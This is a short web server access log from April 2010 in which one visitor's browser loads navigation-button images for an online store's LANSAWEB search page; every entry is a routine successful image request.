131.158.223.4 - - [07/Apr/2010:07:21:48 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
131.158.223.4 - - [07/Apr/2010:07:21:48 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
131.158.223.4 - - [07/Apr/2010:07:21:48 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
131.158.223.4 - - [07/Apr/2010:07:21:48 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
